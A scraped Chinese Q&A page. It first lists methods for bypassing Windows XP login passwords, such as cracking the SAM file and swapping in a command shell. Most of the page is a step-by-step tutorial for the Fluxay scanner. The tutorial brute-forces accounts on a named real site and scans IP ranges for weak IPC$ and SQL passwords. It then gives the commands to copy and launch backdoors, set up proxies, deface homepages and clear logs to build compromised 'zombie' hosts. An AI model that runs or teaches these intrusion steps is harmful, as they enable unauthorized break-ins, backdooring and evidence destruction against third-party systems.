破解邮箱密码用什么软件-企业邮箱密码免费破解软件

怎么使用破解密码程序来破解电脑系统登陆的密码？

Windows XP电脑系统登录密码忘记了，如果你是一个很容易遗忘的人，那么一定不要忘记在第一次设置密码的同时创建一张可以恢复WindowsXP中的账户密码的启动盘，它可以让你免去格式化硬盘的烦恼。 从“控制面板”中找到“用户账户”项，选中自己的账户进入如图所示的控制界面，我们可以看到左侧任务列表中有一项“阻止一个已忘记的密码”，点击后便可打开“忘记密码向导”，向导会提示插入一张格式化过的空白磁盘，操作过程中会让你输入该账户所使用的密码，很快便可以创建一张密码重设盘。 以后，当我们忘记了XP电脑系统登录账户密码的时候，在没有使用“欢迎屏幕”登录方式的情况下登录到WindowsXP后，按下“Ctrl + Alt + Del”组合键，出现“Windows安全”窗口，点击选项中“更改密码”按钮，出现更改密码窗口。这个窗口中，将当前用户的密码备份，点击左下角“备份”按钮，激活“忘记密码向导”，按照提示创建密码重设盘。 如果在WindowsXP的登录窗口输入了错误的密码，就会弹出“登录失败”窗口，如果你的确想不起来自己的密码是什么时，可点击“重设”按钮，启动密码重设向导，通过刚才所创建的密码重设盘，就可以用这张密码重设盘更改密码并启动系统。重新设定密码，登录WindowsXP。 “密码重设盘”的创建，含有一定的危险性，因为任何人都可以使用这一张“密码重设盘”来登录WindowsXP，都可以以该用户的名义进入用户帐户，操作真正用户所能操作的一切，所以必须将“密码重设盘”保存在适当的地方，以防丢失或失泄密。 破解XP电脑系统登录密码方法1——利用“administrator”(此方法适用于管理员用户名不是“administrator”的情况) 我们知道在安装WindowsXP过程中，首先是以“administrator”默认登录，然后会要求创建一个新账户，以进入WindowsXP时使用此新建账户登录，而且在WindowsXP的登录界面中也只会出现创建的这个用户账号，不会出现“administrator”，但实际上该“administrator”账号还是存在的，并且密码为空。 当我们了解了这一点以后，假如忘记了登录密码的话，在登录界面上，按住Ctrl+Alt键，再按住Del键二次，即可出现经典的登录画面，此时在用户名处键入“administrator”，密码为空进入，然后再修改“zhangbp”的口令即可。 破解XP电脑系统登录密码方法2——删除SAM文件(注意，此法只适用于WIN2000) WindowsNT/2000/XP中对用户帐户的安全管理使用了安全帐号管理器(Security Account Manager , SAM)的机制，安全帐号管理器对帐号的管理是通过安全标识进行的，安全标识在帐号创建时就同时创建，一旦帐号被删除，安全标识也同时被删。安全标识是唯一的，即使是相同的用户名，在每次创建时获得的安全标识完全不同。因此，一旦某个帐号被用户名重建帐号，也会被赋予不同的安全标识，不会保留原来的权限。安全帐号管理器的具体表现就是%SystemRoot%system32configsam文件。SAM文件是WindowsNT/2000/XP的用户帐户数据库，所有用户的登录名以及口令等相关信息都会保存在这个文件中。 知道了这些，我们的解决办法也产生了:删除SAM文件，启动系统，它会重建一个干净清白的SAM，里面自然没有密码了。 不过，这么简单的方法在XP是不适用的，可能微软以此为BUG，做了限制……所以现在在XP系统下，即使你删除了SAM，还是不能删除密码，反而会使系统启动初始化出错，从而进入死循环而不能进系统!! 破解XP电脑系统登录密码方法3——从SAM文件中找密码(前提……会使用DOS基本命令就行) 在系统启动前，插入启动盘，进入:C:WINNTSystem3Config 用COPY命令将SAM文件复制到软盘上。拿到另一台机子读取。这里需要的工具是LC4，运行LC4，打开并新建一个任务，然后依次击“IMPORT→Import from SAM file”，打开已待破解的SAM文件，此时LC4会自动分析此文件，并显示出文件中的用户名;之后点击“Session→Begin Audit”，即可开始破解密码。如果密码不是很复杂的话，很短的时间内就会得到结果。 不过，如果密码比较复杂的话，需要时间会很长，这时我们就需要用下面的方法了 破解XP电脑系统登录密码方法4——用其他SAM文件覆盖(前提是你可以得到另外一台电脑的SAM文件和它的密码……个人觉得是最为可行的办法) 1——如上所说，SAM文件保存着登录名以及口令，那么我们只要替换SAM文件就是替换登录名以及口令了。不过，这个替换用的SAM文件的“产地”硬盘分区格式要和你的系统一样(看是FAT32还是NTFS，你自己确认)。最好这个“产地”的系统没有设密码，安全方面设置没动过(实际上很大部分的个人电脑都是这样)，当然，比较保险的方式是把XP的[Win NTSystem 32Config]下的所有文件覆盖到[C:Win NTSystem 32Config]目录中(假设你的XP安装在默认分区C， 2——如果得不到别人的帮助(我是说“万一”)，你可以在别的分区上在安装一个XP系统，硬盘分区格式要和原来的一样，并且请你注意一定不要和原来的XP安装在同一分区!在开始之前，一定要事先备份引导区MBR，备份MBR的方法有很多，使用工具软件，如杀毒软件KV3000等。装完后用Administrator登陆，现在你对原来的XP就有绝对的写权限了，你可以把原来的SAM考下来，用10PHTCRACK得到原来的密码。也可以把新安装的XP的Win NTSystem 32Config下的所有文件覆盖到C:Win NTSystem 32Config目录中(架设原来的XP安装在这里)，然后用KV3000恢复以前悲愤的主引导区MBR，现在你就可以用Administrator身份登陆XP了。 [2号方案我自己都觉得麻烦，还是1号:叫别人帮忙比较好……] 【另外，据说C:windowsepair 目录下的SAM是原始版本的，可以用它来覆盖 system32下的这个 SAM，这样就可以删除现在的密码，而恢复到刚开始安装系统时的密码了。如果这个密码为空，岂不是……】 破解XP电脑系统登录密码方法5——使用Win 2000安装光盘引导 修复系统(前提……很明显吧?就是你要有一张Win 2000安装光盘) 使用Win 2000安装光盘启动电脑，在Wndows2000安装选择界面选择修复Windows2000(按R键);，然后选择使用故障控制台修复(按C键)，系统会扫描现有的Window2000/XP版本。一般只有一个操作系统，所以只列出了一个登录选择(l:C:Windows)。从键盘上按l，然后回车，这个时候，Window XP并没有要求输人管理员密码，而是直接登录进入了故障恢复控制台模式(如果使用的是WindowsXP安装光盘启动的，那是要求输人管理员密码的。这里指的管理员是指系统内建的Administraor账户)熟悉Windows的朋友都知道，故障恢复控制台里面可以进行任何系统级别的操作，例如:复制、移动、删除文件，启动、停止服务，甚至格式化、重新分区等破坏性操作。 测试使用光盘:集成SP3的Windows2000 Proessional 简体中文版。 测试通过的系统:WindowsXP Proessional，打SPI补丁的WindowsXP (FAT32和NTFS文件系统都一样) [需要注意的是，由于各种原因，市面上的一些Windows2000安装光盘不能够显现故障控制台登录选项，所以也无法利用这个漏洞。同时，由于故障控制台模式本身的限制，也无法从网络上利用这个漏洞，换句话说，这个漏洞仅限于单机。] 破解XP电脑系统登录密码方法6——利用NET命令(有两个必要前提才行:按装WINDOWS"/WINDOWSXP的分区必须采用FAT 32文件小系统，用户名中没有汉字。) 我们知道在WindowsXP中提供了“net user”命令，该命令可以添加、修改用户账户信息，其语法格式为: net user [UserName [Password *] [options]] [/domain] net user [UserName {Password *} /add [options] [/domain] net user [UserName [/delete] [/domain]] 每个参数的具体含义在WindowsXP帮助中已做了详细的说明，在此笔者就不多阐述了。好了，我们现在以恢复本地用户“zhangbq”口令为例，来说明解决忘记登录密码的步骤: 1、重新启动计算机，在启动画面出现后马上按下F8键，选择“带命令行的安全模式”。 2、运行过程结束时，系统列出了系统超级用户“administrator”和本地用户“zhangbq”的选择菜单，鼠标单击“administrator”，进入命令行模式。 3、键入命令:“net user zhangbq 123456 /add”，强制将“zhangbq”用户的口令更改为“123456”。若想在此添加一新用户(如:用户名为abcdef，口令为123456)的话，请键入“net user abcdef 123456 /add”，添加后可用“net localgroup administrators abcdef /add”命令将用户提升为系统管理组“administrators”的用户，并使其具有超级权限。 4、重新启动计算机，选择正常模式下运行，就可以用更改后的口令“123456”登录“zhangbq”用户了。另外，zhangbq 进入 登入後在〔控制台〕→〔使用者帐户〕→选忘记密码的用户，然後选〔移除密码〕後〔等出〕 在登入画面中选原来的用户便可不需密码情况下等入 (因已移除了) 删除刚才新增的用户，在〔控制台〕→〔使用者帐户〕→选〔alanhkg888〕，然後选〔移除帐户〕便可 [但是有人提出:在实验后得知——在安全模式命令符下新建的用户不能进入正常模式(此结论暂不确认)] 破解XP电脑系统登录密码方法7——用破解密码软件(前提是你要有标准的系统安装光盘——不是那种“集成”多个系统的D版盘) 1——使用PASSWARE KIT 5.0中的WindowsKEY 5.0，用于恢复系统管理员的密码，运行后生成3个文件:TXTSETUP.OEM、WINKEY.SYS和WINKEY.INF，3个文件共50KB。把这3个文件放在任何软盘中，然后使用XP安装光盘启动电脑，启动过程中按F6键让系统采用第三方驱动程序。此时，正是我们切入的最好时机，放入该软盘就会自动跳到WindowsKEY的界面。他会强行把ADMINISTRATOR的密码换成12345，如此一来何愁大事不成?嗬嗬!当你重新启动以后，你会被要求再次修改你的密码。 2——使用OFFICE NT PASSWORD REGISTRY EDITOR.用该软件可以制作LINUX启动盘，这个启动盘可以访问NTFS文件系统，因此可以很好地支持Windows2000/XP。使用该软盘中的一个运行在LINUX下的工具NTPASSWD就可以解决问题，并且可以读取注册表并重写账号。使用方法很简单，只需根据其启动后的提示一步一步做就可以了。在此，建议你使用快速模式，这样会列出用户供你选择修改那个用户密码。默认选择ADMIN组用户，自动找到把ADMINISTRATOR的名字换掉的用户，十分方便。 3——ERD.Commander2003为Windows的管理员和最终用户，面对随时可能崩溃的系统，可能每人都会有自己的一套工具，用来挽救数据和修复系统。ERD Commander这可以算是Winternals Administrators Pak工具中最强大的组件了，其中一个引人注目的功能就是修改密码，WindowsNT/2000/XP/2003 系统中任何一个用户的密码都可以在不知道原先密码的情况下被ERD修改掉。 破解XP电脑系统登录密码方法8——修改 屏幕保护程序(前提是你有设置屏保) 使用NTFSDOS这个可以从DOS下写NTFS分区的工具。用该软件制作一个DOS启动盘，然后到C:Win NTSystem 32下将屏幕保护程序Logon.Scr改名，接着拷贝Command.com到C:Win NTSystem 32下(WIN2000下可以用CMD.EXE)，并将该文件改名为Logon.Scr。这样启动机器15分钟以后，本该出现的屏幕保护现在变成了命令行模式，而且是具有ADMINISTRATOR权限的，通过他就可以修改密码或者添加新的管理员账号了。改完以后不要忘了把屏幕保护程序的名字改回去。 破解XP电脑系统登录密码方法9——使用启动脚本(前提……会使用DOS基本命令就行) WindowsXP启动脚本(startup scripts)是计算机在登录屏幕出现之前运行的批处理文件，它的功能类似于Windows9×和DOS中的自动执行批处理文件autoexec.bat。利用这个特性，可以编写一个批处理文件重新设置用户密码，并将它加入启动脚本中，这样就达到了目的。以下是具体步骤(假设系统目录为C:Windows)。 1.使用Windows98启动 盘启动电脑。在DOS下新建一个文件叫a.bat，内容只需要一条“net user”命令即可:“Net user rwd 12345678”。这条命令的意思是将用户rwd的密码设置为“12345678”(有关Net命令的用法，可参考Windows帮助)。然后将文件a.bat保存到“C:windowssystem32GroupPolicyMachineScriptsStartup”下。 2.编写一个启动/关机脚本配置文件scripts.ini，这个文件名是固定的，不能改变。内容如下: [Startup] 0CmdLine=a.bat 0Parameters= 3.将文件scripts.ini保存到“C:winntsystem32GroupPolicyMachineScripts”下。scripts.ini保存着计算机启动/关机脚本的设置数据，文件内容通常包含两个数据段:[Startup]和[Shutdown]。[Startup]数据段下是启动脚本配置，[Shutdown]数据段下是关机脚本配置。每个脚本条目被分成脚本名和脚本参数两部分存储，脚本名保存在XCmdLine关键字下，参数保存在XParameters关键字下，这里的X表示从0开始的脚本序号，以区别多个脚本条目和标志各脚本条目的运行顺序。 4.取出Windows98启动盘，重新启动电脑，等待启动脚本运行。启动脚本运行结束后用户rwd的密码就被恢复为“12345678”。 5.登录成功后删除上述步骤建立的两个文件。 [实际上你可以借用另一台电脑用“记事本”编写a.bat和scripts.ini，再用软盘通过DOS复制到自己的电脑上] 说明: 以上脚本使用的是FAT32文件系统，如果使用NTFS文件系统，可以将这块硬盘以从盘模式挂接到其它能识别NTFS文件系统(如Windows2000或WindowsXP)的计算机上进行上述操作。本方法可以恢复管理员(Administrator)的密码。对Windows2000系统中本地计算机用户和域用户的密码恢复同样有效

谁有破解office密码的方法或软件

用OfficePasswordRecovery软件可以破解

方法如下：

打开程序，点击浏览， 打开想要解密的文档；

点击移除密码，选择确定；

显示连接状态，如果出来下面的提示，表示破解密码成功了。

解密成功以后，会生成一个副本文件，我们只要打开这个副本文件，就可以看到原来的密码没有了,文件直接可以打开了。

详细的步骤参考百度经验：

企业邮箱密码

你好，这个问题。如果你是用户，找你们企业邮箱管理员改密码就可以了，如果你是管理员，你用邮箱找回密码就OK了呀。

请问用流光破解企业邮箱在主机那里应该怎么填写阿

这样吧,我这有个杀手的流光教程,希望能对你有用,你自己慢慢研究吧:

谈起国内的黑客，可能因为中国的互联网起步较晚，中国的黑客也很有“中国特色”在我所知道被公认的

第一批黑客中，有许多是很抽象的概念，这里所说的抽象是我当时的感觉，有点雾里看花。听到报纸上说，

XXX黑客黑了XXX，心里立刻素然起敬。

后来上了网，拿着1.44的极品猫恭敬的浏览了这些大侠的站点，便觉得自己也很高大起来，仿佛自己也成了黑客，

后来看看他们所写的一些攻击教程，才发现并不比到隔壁邻居家偷点东西困难:)

再后来自己因为家事离开的网络，主要是上不起，缺￥。之后的事就是常听到新闻、报纸报道XXX黑客黑了某站

点，XXX声称对此负责等等类似的言论。感觉到中国的黑客业真是蓬勃的发展起来了：）

我就曾经遇到这样的黑客，他连win95都不会装，系统出错要打电话给电脑公司的。我就觉得中国的黑客特色

是：浮躁太多、不肯踏脚踏实地的作事情。说白了就是伪黑客太多。

下面是我和一个现在在某个地方担任重职的黑客现实中的对白：

某黑客：“你黑站点用工具么？”

我：“用的”

某黑客：“不用工具，不要用这个，用工具的都是二流黑客，黑个站点用工具？不用的”

我：“哦”

某黑客：“你要黑站点，不用工具你能知道什么”

我看到黑客要指点，立刻全神贯注。

某黑客：“它的80端口是开的，对吧！有端口开着你还用工具干嘛，有端口开着你就黑……”

听起来像新闻中XX功的李XX的讲课。后面还有许多，我也懒的说了。

肯脚踏实地的黑客太少了!

在国内，流光属于个比较不错的扫描器，是个很有潜力的工具，有代表性！

在流光之前，有许多工具具备流光的特性，应该说是流光吸收了他们的优点，但没有一个像流光这样的高集成

度的。

在以前，我一直觉得流光只是个玩具，对于一个站点，我们有多少时间和金钱去暴力猜解呢？包括那些

小的猜解工具，和花样繁多的木马变种。当作练练编程的作品尚可，拿出来吓人就不对了。导致今天的杀毒软

件都敢吹能杀XXX种黑客程序 ：）

正是流光出现的时间较长、很多人都是从流光入门的原因，所以从流光谈起，能给新手一些正确的入门捷径。

我并不是一个流光高手，不能解决你遇到的所有问题，所以当我写下流光的系列教程的时候，心里是很不踏实的。

希望我的这些不成文的系列，能给你的学习带来一些方便。

下面是对新手的几个问题解答：

1、除了流光，国内还有没有其它的比较好的扫描器，说几个。

A：有，scanex X-scan

2、流光好用么 ？

A:用了以后在问 ！

3、我是新手，学习中应该注意什么？

A：少说多做.

二

许多新人在用流光的时候不知道如何下手，小榕论坛来讨论的也多是“如何添加用户”这样的初级问题 ：），就抽了点时间写这个简单的教程,希望让新手快速入门。

我个人认为流光的破解可分为5大部分：

一、POP3/FTP/…探测

二、IPC探测

三、SQL探测

四、高级扫描

五、其它 …

因为开发时间的原因，上面的探测模式略有不同，所以分成了四个部分，本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了：）

下面我就简单说一下基本的破解流程：

1、你得有流光，我这里试验用的是流光2001.FOR Win98 中文版.FOR Win2000的也可以。

首次启动流光，看到如下图的界面：

首次使用是要注册的，不过不要想到花钱：），小榕只是想看看有多少人用他的流光而已。你可以填好相应的选项，然后点发送即可，如果发送失败，你把发送服务器换个就好了。

因为重装系统，我也不知道我发了多少次了 ：（ 。如果不想注册，就稍等下面的进度条走完，点稍后即可。如上图：

2、找个站点，我选的是中华网的主页空间（home4u.china.com），探测方式：FTP。

有人常问扫描端口有什么用，其实作用就是你知道他提供了什么服务，然后可以采取相应的探测方式来获得PASS了：）我们知道主页几乎都用的FTP上传，我们这次就用来测试一堆用户名，看看有没有弱智的密码，呵呵，如果有 hacker.at.china.com 这样的，也不妨霸占为己有：）

3、加入要破解的站点名称：右键单击FTP主机→编辑→添加→输入 home4u.china.com →确定！

4、加入用户名：我们要破解的是一堆用户名，所以要加入用户名的列表文件！我们就加入流光目录下的 Name.dic ：）右键单击刚才添加的主机：home4u.china.com → 编辑 → 从列表中添加 → Name.dic → 打开

然后会有“用户已存在列表中”的提示，我们选中“不再提示” → 确定 。如下图：

用户名太多，我们可以用点主机前面的“—”号把用户列表缩起来，如下图：

大家注意名字前面的小框中必须有√要是没有就无法探测了。

5、有了用户名，我们就可以进行探测了，大家会想到怎么不用密码？其实流光有个简单模式的探测，也就是用内置的密码”：“123456”和“用户名”来进行探测，因为这样的密码是使用频率最高的：）

当然你可以修改这个简单模式的文件，加入你认为弱智的密码。方法是：单击 工具菜单 → 模式文件设定 → 简单模式探测设置文件 → 加入你要加入的密码 → 把设置文件存盘！

下面我们就来看看这一堆名字里面有多少是用“123456”和“自己名字”来作为密码的。

探测 → 简单模式探测！

探测中…

6、探测完毕，也看到结果了，流光会问我们是否查看入侵检测报告，不想看可以选否。

报告的画面

7、如果要探测的是一个用户名，就需要添加字典、或者密码方案。方法是：右键单击解码字典或方案 → 编辑 → 添加 → 选择一个密码档即可。

以上就是流光的一次简单的探测了，事实上这些功能只能算是流光的2.5版的功能，流光2001增加的IPC/SQL/高级扫描等功能，使流光更加强大。如果你对这个已经很熟悉了，相信你看流光的HELP就会很快的学会其它的使用方法的。

关于用户名的问题：有人觉得自己加入的用户名不一定存在，如果不存在岂不是白费了力气？这点你大可以放心，流光会进行验证的。而且现在注册的用户入数之多，想个没有的名字都难，不信你随便敲个试试。

关于字典的问题：流光可以使用字典方案来探测，当然你也可以生成字典，有的新手在作练习的时候不知道怎么做，你也可以用记事本生成，每行输入一个密码，存盘后将扩展名改称.DIC，流光就认出来了：）如果你连扩展名都不会改 ：（ 那……

只要是学习、谁都会遇到困难，我也是问题多多，还得向小榕、EKIN讨教，欢迎大家多交流 ：）

三

很长时间也没有写什么东西了，这源于我的懒惰和生活缺乏激情。我的记事本上一大篇都是欠朋友的承诺 ：（

你既然看到这儿了，就在听我牢骚几句吧：）搞安全应该有正确的心态，别以为你会了个工具使用就可以一步登天。

交流、学习才是最重要的，把自己心态放正，无论我们是高还是低。

今天要写的是流光的IPC探测：

一、目的和任务：

1、用流光的IPC探测获得一台NT主机的管理权限，并将这台主机做成一个跳板/代理。

2、学习IPC探测的相关知识。

二、探测流程：

1、你得有流光，我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/

2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000，否则流光启动会失败！

什么是IPC：

IPC是指"InterProcess Communications",准确的说是ipc$，是默认的在系统启动时的admin共享。

IPC$是Windows NT/2K中特有的远程网络登陆功能，它的特点是在同一时间内，两个IP之间只允许建立一个连接。

注意，你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。

可不可以通过IPC$暴力破解密码？当然可以 ！ 不过，是不是太笨了点 …

2、首次启动流光，会看到注册的画面，具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC

探测获得管理的权限。这里我们要作的是得到一台跳板，那么就可以用命中率高的办法来探测了（测试一堆IP来得

到弱口令）。

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。

图main1

图main2

3、出先了上面的小窗口，输入我们要破解的IP段，我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令，这样可以加快扫描的速度 ：）填入IP，选择扫描NT/98主机

4、探测中…… （start1）

（注意如果你要探测的是流光保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现"IP保留"的字样）

5、这是扫描到的NT/98主机列表：（jg1）

6、没有扫描到常用密码：（

7、就不要查看报告了 ：…

8、有了不少NT/98的机器了，正式开始IPC$探测：IPC$主机－探测－探测所有IPC$用户列表。

9、注意下面两个对话框的设置：全选上，我们只要IPC$管理员的弱口令。然后点选项

10、点“选项” ：为了加快弱口令扫描速度，这里的两个我们可以全部取消，比如下面的那个，如果对方禁止列出用户了，我想对于一个网管来说，弱口令可能性也是微乎其微。

11、探测中……

12、有密码了：）

13、又出现了查看报告的窗口，看看 ：）

14、有远程主机的管理密码了，我们剩下的就是想办法控制它了，有什么好办法么？ ：）有的是 ！自己看看工具－

菜单下的IIS远程命令:)是不是很简单呢，我以后在说，今天还是先练习net 命令吧。

15、黑了他 ！

开个dos prompt 执行如下命令，本次用的例子如下图。

1、 net use \\对方ip\ipc$ "密码" /user:"用户名" || 建立远程连接

2、 copy icmd.exe \\对方ip\admin$ || admin$是对方的winnt目录 ：） 这里文件多。

3、 net time \\对方IP || 看看对方的本地时间

4、at \\对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序，在这里我们用soon这个程序来做也可以，它可以取代 3/4两步。

5、 telnet 对方ip 端口 ||

6、输入pass （如果不是用icmd.exe，或者没有设置口令就不用了） ||

7、在开个窗口，继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

图cmd1

图cmd2

如果我们真的想黑了他，只需要把我们的首页文件覆盖目标的首页就ok了，我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止，一般是在X:\interpub\wwwroot\ .

假如首页文件是default.htm并且在c:\interpub\wwwroot，这样:copy default.htm \\ip\c$\interpub\wwwroot

下面的图有演示

7、其实黑人家是很低级并且没意思的：（，我们最好是物有所有，作成跳板吧，今后干活方便点：）

执行我们copy 过去的ntlm.exe ，取消验正。在给自己留个后门，比如提升guest的权限，或者其它的后门工具，这类东西多了自己选吧，看看杀手copy的那堆东西 ：）

8、做个SOCK5代理玩玩，用在QQ上不错喔：

执行我们copy 过去的sock -install，net start skserver 看看用在QQ上的效果：）

是不是没有看清上面的步骤呢？

下面是我telnet 上去后所有的命令：）

9、还能做成其他的么 ？

当然了，只要你有时间，并且愿意做，我曾经偷偷的把自己的主页放到人家的server上，速度快、空间无限，嘿嘿 ：）

10、日志清除，断开连接 ：

执行我们copy 过去的cl.exe clear.exe 都可以清除日志，比如clear all ：清除所有的日志。然后在断开连接：net use \\ip\ipc$ /delete

这步我认为是必需的，尤其是在一些有争议的站点上，或者是国内的站点，除非你想让电视上报导XXX地区我神勇刑警捕获弱智黑客一名XXX。

在网吧写完 ：（ 错误之处请赐教。

只要是学习、谁都会遇到困难，我也是问题多多，还得向小榕、EKIN讨教，欢迎大家多交流 ：）

四

关于IPC$的终于写完了，那个该死的网吧，闹哄哄的声音声声入耳 ：（，你可能想不出，IPC$探测是我在网吧完成的，而且那个网吧还有公安部门的网络监视器，这东西很有意思，好像是VXD调用，和IE运行库集成到一起的。哪天非弄来研究一下，说不定一款别具特色的木马就问世了 ：）

不知道你看完前一个教程有没有要扁我的想法。。。。

交流、学习才是最重要的，把自己心态放正，无论我们是高还是低。

今天要写的是流光的SQL探测，顺便说说ipc$补遗和其它的探测手段。

一、目的和任务：

1、用流光的SQL探测获得一台NT主机的管理权限。

2、学习SQL探测的相关知识。

3、IPC$补遗和其它…

二、探测流程：

1、你得有流光，这话不用在说了吧：）

什么是SQL：

SQL：微软开发的数据库，专门用在微软的OS上，功能类似Linux 下的Mysql，晕……，到底谁类似谁啊？有时间

去看看SQL的联机手册，说的很明白。

SQL服务程序支持的网络协议:

Named pipes :使用NT SMB端口来进行通信，存在被SNIFFER截获数据的危险。

IP Sockets :默认状态下开1433端口，可以被扫描器探测，存在被SNIFFER截获数据的危险。

Multi-Protocol ：客户端需要支持NT RPCs，数据加密。

NWLink ：存在被SNIFFER截获数据的危险。

AppleTalk (ADSP)：存在被SNIFFER截获数据的危险

Banyan Vines ：存在被SNIFFER截获数据的危险

在Internet上，95％以上的SQL Server 采用的都是IP Sockets协议，流光探测的就是这个协议默认的1433端口

2、我们要获得SQL 主机的管理权限，那么还用命中率高的办法来探测了（测试一堆IP来得到弱口令）。

对一台固定主机的探测等我下期的教程：）

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。

图main

3、出先了下面的小窗口，输入我们要破解的IP段，我们输入了来看看。（注意如果你要探测的是流光保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现“地址保留的信息”）

图inputip

4、探测中……

5、有密码了：） 图psss 1→3

6、下面我们进一部获取管理员的权限。

用SQL 客户端去连接主机，没有装SQL :( ……………… 没关系，流光自带了连接的工具，以前我一直都是用的天行的工具SQLexec，但现在可以不用它了。

打开菜单 工具 → MSSQL工具 → SQL远程命令看看：）

图tools

图SQLcmd

7、获得管理权限、增加后门

图cmdline

8、现在我们已经是管理员了：）

以前我们是用at命令来远程运行程序，今天顺便说说流光中自带的“种植者”，看看 工具 → nt/iis工具 → 种植者，我们来用它远程启动icmd这个后门。

图lookcrop

图crop

图cropend

一分钟后登陆看看：

9、再说说 工具 → 模式文件设定 → ipc简单设置文件 。

图mode

“工具”中其他的项目和上面说的两个类似，就不多说了。

10、日志清除，断开连接 ，参考IPC探测，记住可以用种植者远程执行命令。

关于IPC$补遗：上篇对与IPC$探测的文章，写完后觉得还差点什么没有说：）

1、我们虽然只探测管理员（admin）的弱口令，实际上在真正攻击中是任何一个用户口令都不会放过尝试的，因为我们获得了

普通用户权限后可以提升权限，事实上，一个普通用户的权限在＊nix攻击中是非常重要的。

2、获得口令后，攻击手法多样，不要局限于我的例程。

3、如果对方没有XXX怎么办？，这类的问题去看看我以前整理的流光FAQ。

关于其它探测：

玩玩3389 ？

首先终端是WIN2K提供的功能，所以我们在扫描的时候就要选择 “NT/98”的主机，在得到主机列表后自定义端

口来扫描这些主机的3389端口，然后……

玩玩cisco路由器？

自己想想怎么作 ？要是想出来了，我的以后的教程就不用看了 ：）

明白了么？我说的意思是要灵活使用流光：）

五

以前一不小心吹出了要写流光教程的想法，结果话说出口就无法收回，如果上天肯给我一次改正的机会的话，我要对这套教程说，我不写。如果非要逼我说出内心的想法，我要说的是：不写不写就是不写！：）

交流、学习才是最重要的，把自己心态放正，无论我们是高还是低。

今天要写的是流光的高级扫描向导：

一、目的和任务：

1、学会高级扫描向导的使用！

2、学习扫描的原理。

二、探测流程：（针对某一个ip）

1、start fluxay !

以前我们都是通过某一种探测手段，来测试很多ip获得相应的脆弱系统的管理权限。

对于某个IP的主机，是不是有点束手无策了呢？

：） 试试流光的高级扫描。。。

本次的受害者。。。是我所在的xxx内部服务器 . ip:192.168.0.1

什么是扫描：

简单的说，就是利用get /put /send 等方法获取目标主机的信息的手段。

向目标主机发出请求，如果目标主机的某个端口正在侦听，就会对我们的请求给予一定的相应，我们就可以通过

这些返回的数据来判断目标主机的状态。

2、高级扫描提供了两种方式：

1）向导模式 (文件－高级扫描向导)

2）正常模式（探测－高级扫描工具）

就功能而言，这两种方式没有什么不同，主要是看个人的使用习惯，当然向导模式比较易用。

图1 图2

好了，我们用图1中的向导模式 Ctrl+W 。

图option

3、出先了上面的小窗口，输入我们要破解的IP，把起始地址和结束地址输入相同的ip。

目标系统：如果你知道，就选择相应的系统，如果选择all ,流光会自动判断，但毕竟影响了时间。

如何判断目标的系统呢 ？

最简单的就是ping 和浏览对方的主页了 ，看对方主页，如果状态栏有本地asp调用，基本可以判断是win2k的系统，要是php调用，就可以认为是unix类系统。

下面ping的结果证明这台主机是Win2K Server，所以目标系统就选择：“Windows NT /2000”

图ping

检测项目 ：因为是针对一台主机，当然获得的信息越多越好，所以检测项目就“全选”

这是选择完的贴图：

option1

4、设置扫描的端口，这个标准就行。

图ports

5、Pop3探测设置，默认即可。

图pop3

6、Ftp探测设置，默认即可。

图ftp

7、smtp探测设置、imap探测设置、telnet探测设置、cgi探测设置，全部采用默认设置。一直点击“下一步”到cgi rules （cgi规则的设置）

图cgi

8、下面的sql探测设置、ipc探测设置、iis探测设置、misc探测设置，全部采用默认值：一直点击“下一步”到plugins（插件设置）

图plugins

9、最后设置“猜解用户名字典、猜解密码字典、保存扫描结果的位置、扫描线程、网络选项”都用默认的了，当然你

可以根据具体情况更改，不要总是照搬：）

end

10、探测中，出现了不少探测的结果 ：）图check

11、这次的报告是最值得看的 ：－ 图report

12、扫描结果简单分析：图all

三、快速获得肉鸡的方法：

约定：1、要获得nt 肉鸡 2、使用ipc、sql、idq、printer 来获取 ，都是可以直接得到管理权限的 ：）

下面的扫描向导中，我可以只选择符合上面的选项了。

看看图片，和上面的比较理解一下。

不到一分钟就出来结果了，快 ！ 需要注意的就是在最后一步的“猜解的用户名、猜解的字典”这两个尽量自己把默认的字典内容修改一下，比如“密码字典”中只有123456，会大大加快速度 ：）

记住要写两行哦

流光是不是只会对付Windows/NT呢 ？

当然不是，我现在只是举NT的例子。

如果我的教程给你这样的想法，那…… 小榕可能要痛扁我了 ：（

六

交流、学习才是最重要的，把自己心态放正，无论我们是高还是低。

今天要写的是流光的扫描结果分析：

一、目的和任务：

1、分析并利用流光的扫描结果。

2、顺便学点相关的知识。

二、开始分析：

1、具备相关的系统知识，基础是必须的 。

比如21端口开放：想到了什么呢？wu_ftp溢出 ，本地权限提升，溢出root ？这需要点经验了，但你至少应该想到去cd /看看吧。

其他还有好多，看看基础的书吧，我只能说一下方法。

2、我们用IPC$扫描和上篇的高级扫描，我们得到的许多结果，比如idq、print、unicode、frontpage，来对这些结果进行分析利用一下。

先说说一般攻击流程：

1）确定攻击目标：这个要看我们的目的了 ；）

2）搜集目标的相关资料

3）根据获得的信息进行攻击

4）获得最高权限

5）留后门、清理日志

现在我们已经能够获得对方的相关资料了，在NT Server 中后门和日志也说过了，所以今天说3、4步的内容。

2、具体攻击实施方法：

1）利用url攻击的方法：这种方式用的很多，比如unicode。通常是在IE地址栏通过提交修改的URL，进行非法登陆或者浏览等。

2）利用暴利破解：比较费时，但也有一定的技巧可寻，比如用finger后的用户列表进行简单探测。

3）利用系统的相关服务攻击：比如输入法漏洞＋终端，Frontpage 扩展，行行色色的溢出等。

如何进行溢出呢 ？

一般来说是在网上找到针对漏洞相关的溢出源码，根据自己的需要进行修改，然后用gcc 或者c++等编译，最好用编译好的程序攻击了，绝大多数都是这样的格式：program.exe -option ip

是不是觉得很难呢？

